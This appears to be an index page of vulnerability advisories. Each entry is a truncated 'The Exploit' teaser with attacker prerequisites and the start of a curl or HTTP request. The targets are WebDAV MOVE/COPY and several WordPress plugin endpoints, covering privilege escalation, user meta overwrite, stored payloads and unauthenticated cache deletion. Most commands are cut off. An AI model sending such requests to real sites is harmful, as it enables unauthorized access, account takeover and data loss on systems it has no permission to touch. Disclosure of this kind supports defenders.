## The Exploit Requires only network access to a DAV-enabled aliased prefix location; no privileged credentials are needed if the `MOVE`/`COPY` endpoint is exposed. ```bash curl -i -s -X MOVE 'http://TARGET/webdav/secret.txt' \ -H 'Host: TARGET' \ -H 'Destination: http://TA...
## The Exploit Authenticated attacker needs Author-level access to the WordPress admin area and the ability to update the Same Category Posts widget settings. ```http POST /wp-admin/admin-ajax.php HTTP/1.1 Host: target.example Cookie: wor...
Read article →## The Exploit An unauthenticated attacker can submit a payload through the front-end post submission form and have it stored inside custom field output. ```bash # 1) store the payload via the front-end submission endpoint curl -sk -X POS...
Read article →## The Exploit Authenticated Subscriber-level users can abuse the plugin's AJAX callback to overwrite arbitrary string user meta on their own account. ```bash curl 'https://TARGET/wp-admin/admin-ajax.php' \ -H 'Content-Type: application...
Read article →## The Exploit An authenticated WordPress user with subscriber-level access can invoke the custom tables migration AJAX action directly. ```bash curl 'https://TARGET/wp-admin/admin-ajax.php' \ -H 'Content-Type: application/x-www-form-ur...
Read article →## The Exploit The attacker needs no WordPress authentication; they only need to send a POST to the token endpoint with a `Referer` header pointing at any page that contains the Ninja Forms Submissions Table block. ```bash curl -i -s -X P...
Read article →## The Exploit Attacker needs a victim who is logged in to the target WordPress site. ```bash curl 'https://TARGET.EXAMPLE/' \ -H 'Content-Type: application/x-www-form-urlencoded' \ --data 'action=uc&u=123&e=victim%40example.com&nk=VI...
Read article →## The Exploit Attacker needs authenticated Contributor-level access or higher and a valid `FinalTiles_gallery` nonce from the plugin’s admin UI. ```bash curl 'https://TARGET/wp-admin/admin-ajax.php' \ -H 'Content-Type: application/x-ww...
Read article →## The Exploit Unauthenticated attackers can delete the plugin's local font cache simply by visiting the plugin admin page slug. ```bash curl -i -s 'https://target.example.com/?page=bsf-custom-fonts' -o /dev/null -w '%{http_code}\n' ``` ...
Read article →## The Exploit Unauthenticated attackers only need access to a front-end ACF Extended form where the `role` field is mapped to the user-registration action. ```bash curl -i -X POST "http://TARGET/?acf_form=submit" \ -H "Content-Type: ap...
Read article →